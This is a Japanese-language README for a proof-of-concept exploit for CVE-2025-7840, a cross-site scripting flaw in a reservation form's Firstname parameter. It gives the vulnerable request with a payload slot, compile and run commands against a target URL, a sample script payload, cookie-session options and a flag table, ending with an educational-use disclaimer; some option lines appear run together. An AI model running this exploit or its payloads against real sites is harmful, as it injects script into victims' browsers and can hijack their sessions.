
CVE-2025-7840の概念実証エクスプロイトで、予約フォームのFirstnameパラメータに悪意のあるペイロードを注入してXSSをトリガーします。
作者: Byte Reaper (@ByteReaper0)
CVE-2025-7840 の概念実証エクスプロイト。予約フォームの Firstname パラメータにおけるユーザー入力のサニタイズが不十分な脆弱な Web アプリケーションエンドポイントを標的としています。次のような GET リクエストを作成することで:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
攻撃者はレスポンスがレンダリングされた際に被害者のブラウザで任意の JavaScript を注入・実行できます。
-b オプションでカスタムペイロードを注入-c オプションでクッキーベースのセッションを処理-v)libcurl 開発用ヘッダargparse ライブラリエクスプロイトをコンパイル:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
ターゲットに対してデフォルトペイロードを実行:
sudo ./exploit -u http://victim.local
カスタムペイロードを使用:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
セッションクッキーと冗長出力を含める:
sudo ./exploit -u http://victim.local -c cookies.txt -v
このコードは教育およびテスト目的でのみ提供されています。自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法であり、非倫理的です。
MIT
| フラグ |
|---|
| 説明 |
|---|
-u URL | ターゲットのベース URL (例: http://victim.local) |
-b PAYLOAD | 注入するカスタム XSS ペイロード |
-c FILE | セッション処理に使用するクッキージャーファイル |
-v | 冗長モード (リクエスト/レスポンスの詳細を表示) |